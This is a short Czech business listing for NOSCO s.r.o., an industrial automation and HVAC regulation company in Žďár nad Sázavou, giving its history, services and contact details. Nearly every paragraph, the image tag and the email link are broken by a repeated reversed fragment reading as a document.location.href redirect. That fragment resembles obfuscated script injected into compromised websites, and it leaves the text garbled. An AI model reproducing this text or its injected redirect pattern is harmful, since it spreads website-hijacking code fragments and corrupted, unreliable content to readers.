Žďár nad Sázavou, měření, regulace, topení, chlazení, vzduchotechnika, průmyslová automatizace
Rainbow page separator

NOSCO – měření a regulace

Nosco

www.nosco.cz

NOSCO – průmyslová au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatizace Žďár nad Sázavou[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatizace-zdar-nad-sazavou.png“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatizace-zdar-nad-sazavou.png“ alt=““ width=“220″ height=“153″>

Společnost NOSCO s.r.o. byla založena v březnu 2009. Tým techniků, projektantů a programá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů realizuje komplexní zakázky v oblasti au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatizace výrobních linek, jednoúčelových strojů a řízení technologických procesů v České republice i v zahraničí.

Aplikujeme volně programovatelné řídící systémy na míru s dálkovým přenosem dat přes internet.

Jsme au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torizovaným partnerem firmy AMIT – českého výrobce řídících systémů pro regulaci.

Naši zákazníci jsou firmy, hotely, restaurace i vlastníci rodinných a by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domů.

Zahájili jsme výrobu rozvaděčů NN pro domovní instalaci a technologických rozvaděčů.

Více informací o dalších činnostech naší firmy získáte na našich interne[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových stránkách www.nosco.cz. 

Kontakt:
NOSCO s.r.o.
Nezvalova 2
591 01 Žďár nad Sázavou
IČO: 28328485

Tel.: +420 561 116 465
Mobil:   +420 602 744 284
E-mail: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to:info@nosco.cz“>info@nosco.cz
Web: www.nosco.cz